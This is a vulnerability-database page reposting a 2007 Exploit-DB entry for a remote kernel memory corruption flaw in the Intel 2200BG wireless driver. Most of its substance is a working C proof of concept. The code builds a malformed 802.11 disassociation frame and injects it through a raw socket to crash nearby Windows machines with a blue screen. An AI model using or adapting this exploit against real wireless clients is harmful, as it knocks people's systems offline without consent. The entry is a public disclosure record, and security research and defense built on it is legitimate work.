Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption

🗓️ 29 Jan 2007 00:00:00Reported by Breno Silva PintoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 34 Views

Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption vulnerability description and proof of concep

Code
/*
Title:  Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

Description:  The intel wireless mini-pci driver provided with Intel
/*
Title:  Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

Description:  The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote  memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)

This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).

Driver files:

w29n51.sys      9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll    35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll     980f58b157baedc23026dd9302406bdd

Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)


Proof Of Concept:
*/

#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// 28 bytes disassociation packet.

char d[] = { 0xa0, 0x00,    // 0xa0 pacote Disassociate  0xa000 FC Normal
            0x00, 0x00, // Duration ID
            0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
            0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
            0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
            0x00, 0x00, // Frag. Number
            0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code

int main() {
       struct sockaddr_ll link;
       struct ifreq iface;
       int s;
       char packet[sizeof(d)];
       int len = 0;

       if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
               return 0;

       bzero(&iface,sizeof(iface));
       bzero(&link,sizeof(link));
       bzero(packet,sizeof(d));

       strcpy(iface.ifr_name,"ath0raw");

       if(ioctl(s,SIOCGIFHWADDR, &iface)) {
               return 0;
       }

       if(ioctl(s,SIOCGIFINDEX, &iface)) {
               return -1;
       }

       if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
               return -1;
       }

       link.sll_family = AF_PACKET;
       link.sll_ifindex = iface.ifr_ifindex;

 if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
               return -1;
       }

       memcpy(packet,d,sizeof(d));
       len = sendto(s,packet,sizeof(d), 0, NULL, 0);
       usleep(5000);
       printf("%d bytes enviados\n",len);

       close(s);

       return 0;
}

// milw0rm.com [2007-01-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
intel2200bgdisassociation packetkernel memory corruptionvulnerabilityproof of conceptremote memory corruptiondenial of servicew29n51.sysw29mlres.dllw29ncpa.dllbreno silva pintosekure.orgexploit
34